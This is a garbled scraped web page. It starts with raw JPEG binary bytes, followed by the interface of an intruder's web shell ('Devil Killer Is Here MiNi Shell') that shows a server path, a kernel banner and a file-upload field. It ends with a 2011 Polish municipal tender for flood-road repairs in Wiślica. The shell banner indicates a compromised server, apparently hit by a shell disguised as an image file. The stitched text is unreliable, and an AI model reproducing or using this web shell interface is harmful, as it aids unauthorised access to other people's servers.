JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110411/73140-N-2011.html

<p class="kh_header"><b>Wiślica: Remont dróg powodziowych w miejscowościach: Górki, Skotniki Dolne, Skorocice, Kobylniki</b><br>
<b>Numer ogłoszenia: 73140 - 2011; data zamieszczenia: 11.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wiślica , ul. Okopowa 8, 28-160 Wiślica, woj. świętokrzyskie, tel. 041 3792106, faks 041 3722128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ug.wislica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg powodziowych w miejscowościach: Górki, Skotniki Dolne, Skorocice, Kobylniki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont dróg powodziowych na terenie Gminy Wislica a w szczególności:
1.Remont drogi na działkach 417,418,419 obręb Górki od km 0+000 do km 0+620 dł.620 mb,
UWAGA!!
Dokumentacja projektowa sporządzona jest na cały odcinek drogi tj: 1220 mb. Przedmiotem zamówienia jest wykonanie 620 mb 
Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 9 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr 21 do SIWZ
- Książka przedmiarów - Załącznik Nr 15 do SIWZ
2.Remont drogi na działce nr 231/1 obręb Skotniki Dolne od km 0+000 do km 0+280 dł.280 mb,
Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 10 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr 21 do SIWZ SIWZ
- Książka przedmiarów - Załącznik Nr 16 do SIWZ
3.Remont drogi na działce nr 402 obręb Skotniki Dolne ( Targówka )od km 0+000 do km 0+280 dł.280 mb,
Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 11 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr 21 do SIWZ - Książka przedmiarów - Załącznik Nr 17 do SIWZ
4.Remont drogi na działce nr 206 obręb Skorocice od km 0+000 do km 0+300 dł.300 mb,
Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 12 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr 21 do SIWZ - Książka przedmiarów - Załącznik nr 18 do SIWZ
5.Remont drogi na działce nr 375 obręb Kobylniki od km 0+000 do km 0+210 dł.210 mb,
Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 13 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr 21 do SIWZ - Książka przedmiarów - Załącznik nr  19 do SIWZ
6.Remont drogi na działce nr 443 obręb Kobylniki od km 0+000 do km 0+300 dł.300 mb. 
Szczegółowy opis przedmiotu zamówienia zawierają: 
- Dokumentacja projektowa - Załącznik Nr 14 do SIWZ
- Specyfikacja techniczna wykonania i odbioru robót budowlanych - Załącznik Nr 21 do SIWZ - Książka przedmiarów - Załącznik nr 20 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego polegającego na powtórzeniu tego samego rodzaju zamówień co zamówienie podstawowe określone w przedmiocie zamówienia, zgodne z przedmiotem zamówienia podstawowego, na zasadach określonych w art. 67 ust.1. pkt. 6) ustawy- Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
1) Ustala się wadium dla całości zamówienia tj zadanie 1+zadanie 2 + zadanie 3 w wysokości 15 600,00 zł (słownie: piętnaście tysięcy sześćset zł)
2) Ustala się wadium w zakresie poszczególnych zadań od 1 do 3 w wysokości:
2.1) dla zadania nr 1 w wysokości: 13 000,00 zł, (słownie: trzynaście tysięcy zł).
2.2) dla zadania nr 2 w wysokości: 1 300,00 zł, (słownie: jeden tysiąc trzysta zł).
2.3) dla zadania nr 3 w wysokości: 1 300,00 zł, (słownie: jeden tysiąc trzysta zł).
2.4) w przypadku składania oferty na dwa  zadania wybrane do realizacji przez Wykonawcę wysokość wadium ustala się na kwotę sumy wartości kwot ustalonych przez Zamawiającego dla poszczególnych zadań.
2. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)  w pieniądzu, przelewem na rachunek bankowy: 
Bank Spółdzielczy w Busku-Zdroju o/ Wiślica, nr rachunku 37 84800004 2002 0060 0284 0005 dla wadium z adnotacją:
a) w przypadku składania oferty na zadanie od 1 do 3 -  wadium - Remont dróg powodziowych w miejscowościach: Górki, Skotniki Dolne, Skorocice, Kobylniki - zadanie od 1 do 3.
b) w przypadku składania oferty na zadania nr 1 -wadium- Remont drogi gminnej w miejscowości Górki, Skotniki Dolne, Skorocice- zadanie nr 1.
c) w przypadku składania oferty na zadanie nr 2 - wadium- Remont drogi na działce nr 375 obręb Kobylniki - zadanie nr 2.
d) w przypadku składania oferty na zadanie nr 3 - wadium- Remont drogi na działce nr 443 obręb Kobylniki- zadania nr 3.
e) w przypadku składania oferty na dwa zadania wybrane przez Wykonawcę - wadium - Remont dróg  w miejscowości            - zadanie nr           , zadanie nr
2)w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3) w gwarancjach bankowych, 
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) 
U W A G A!!! 
W przypadku:
- Wniesienia wadium w pieniądzu przelewem na rachunek bankowy do oferty należy dołączyć kserokopię potwierdzoną za zgodność z oryginałem lub oryginał dokumentu wadialnego - przelewu, 
- Wniesienia wadium w pozostałych formach innych niż pieniężna należy dołączyć do oferty dokument w oryginale.

3. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
4. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
5. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna. - oświadczenie Nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) W przypadku składania oferty częściowej na Zadanie Nr 1 wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 2 robót budowlanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. 
Za spełnianie warunku w zakresie Zadania Nr 1 Zamawiający uzna, jeżeli Wykonawca wykaże co najmniej 2 roboty budowlane tj. 
- wykonania drogi o nawierzchni z kamienia o długości 600 mb 
- wykonania drogi o nawierzchni asfaltowej o długości 860 mb 
2.2) W przypadku składania oferty częściowej na Zadanie Nr 2 wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 1 roboty budowlanej w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. 
Za spełnianie warunku w zakresie Zadania Nr 2 Zamawiający uzna, jeżeli Wykonawca wykaże co najmniej 1 robotę budowlaną tj. 
- wykonania drogi o nawierzchni z kamienia o długości 200 mb 
2.3) W przypadku składania oferty częściowej na Zadanie Nr 3 wymagane jest wykazanie przez Wykonawcę realizacji co najmniej 1 roboty budowlanej w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. 
Za spełnianie warunku w zakresie Zadania Nr 3 Zamawiający uzna, jeżeli Wykonawca wykaże co najmniej 1 robotę budowlaną tj. 
- wykonania drogi o nawierzchni z kamienia o długości 300 mb 
2.4) W przypadku składania oferty na więcej niż jedną część zamówienia Wykonawca zobowiązany jest wykazać się odpowiednio większym doświadczeniem w powyższym zakresie  i w przypadku składania oferty na:
Dwie lub trzy części zamówienia Wykonawca winien okazać się sumą robót/doświadczeń opisanych dla poszczególnych zadań zaoferowanych przez Wykonawcę do realizacji.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, wymagane jest wykazanie przez Wykonawcę, że: dysponuje lub będzie dysponował narzędziami w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.
1) W przypadku składania oferty częściowej na Zadanie Nr 1 Zamawiający żąda aby Wykonawca wykazał że dysponuje lub będzie dysponował: 
- Rozściełaczem  mas bitumicznych co najmniej - szt 1
- Walcem drogowy co najmniej - szt 2,
- Koparką co najmniej - szt 2,
- Samochodem samowyładowczy co najmniej - szt 2,
- Piłą do cięcia asfaltu co najmniej - szt 1 
- równiarka co najmniej - szt 1.
2) W przypadku składania oferty częściowej na Zadanie Nr 2 lub Zadanie Nr 3 albo Zadanie Nr 2 i 3   Zamawiający żąda aby Wykonawca wykazał że dysponuje lub będzie dysponował: 
- Walcem drogowy co najmniej - szt 2,
- Koparką co najmniej - szt 2,
- Samochodem samowyładowczy co najmniej - szt 2,
- równiarka co najmniej - szt 1.
3) W przypadku składania oferty na całość zamówienia tj: Zadanie Nr 1,2 i 3 Zamawiający żąda aby Wykonawca wykazał że dysponuje lub będzie dysponował: 
- Rozściełaczem  mas bitumicznych co najmniej - szt 1
- Walcem drogowy co najmniej - szt 2,
- Koparką co najmniej - szt 2,
- Samochodem samowyładowczy co najmniej - szt 2,
- Piłą do cięcia asfaltu co najmniej - szt 1 
- równiarka co najmniej - szt 1.
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna. - oświadczenie Nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna. - oświadczenie Nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę- Załącznik Nr 1 do SIWZ.
2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych - Załącznik Nr 3 do SIWZ.
3) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych - Załącznik Nr 4 do SIWZ.
4) Wykaz osób do kontaktów z Zamawiającym - Załącznik Nr 5 do SIWZ.
5) Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.
6) Formularze cenowe w zakresie wybranych przez wykonawcę zadań od 1 do 3 - wypełnione i podpisane przez wykonawcę - Załącznik Nr 2 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w zakresie:  
1.1 Zmiany terminu przewidzianego na zakończenie robót w następujących okolicznościach:
1)  Zmiany spowodowane warunkami atmosferycznymi w szczególności:
- klęski żywiołowe,
- warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów.
2) Zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowymi.
3) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego w szczególności:
- wstrzymanie robót przez Zamawiającego,
- konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonywania i odbioru robót,
4) Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące niemożliwością prowadzenia prac lub wykonania innych czynności przewidzianych umową, w szczególności na skutek zlecenia Wykonawcy zamówień dodatkowych, zgodnie z przepisami odrębnymi.
2 Zmiana sposobu spełniania świadczenia, na skutek zmian technologicznych spowodowanych następującymi okolicznościami:
1) pojawienie się na rynku materiałów nowszej generacji, pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub umożliwiające uzyskanie lepszej jakości robót.
2) Konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych, niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy.   
3 Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1) zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy, na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug.wislica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Wiślicy, Ul. Okopowa 8, 28-160 Wislica, pok Nr 12- I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2011 godzina 08:00, miejsce: Urząd Gminy w Wiślicy
Ulica Okopowa 8
28-160 Wiślica
Pokój nr 9 - I piętro, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remontu dróg gminych w miejscowościach Górki, Skotniki Dolne, Skorocice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w zakresie zadania jest:
1. Remont drogi gminnej na działkach 417,418,419 obręb Górki od km 0+000 do km 0+620 dł.620 mb - zakres obejmuje:
1.1 Roboty pomiarowe przy robotach ziemnych dla trasy drogowej w terenie równinnym - 0.620 km,
1.2 Koryta wykonywane mechanicznie gł. 15cm w gruncie kat. II-VI na całej szerokości jezdni - 2480 m2,
1.3 Warstwy odsączające zagęszczane mechanicznie o gr 10cm - 2480 m2,
1.4 Nawierzchnie z kruszywa kamiennego 31,5-63 - warstwa dolna o gr. 15 cm - 2480 m2,
1.5 Nawierzchnie z kruszywa kamiennego 0-31,5 - warstwa górna o gr. 10 cm - 2480 m2,
1.6 Kopanie rowu z uzupełnieniem i wyrównaniem poboczy nadmiar ziemi z odwozem do 1 km - 1240 m,
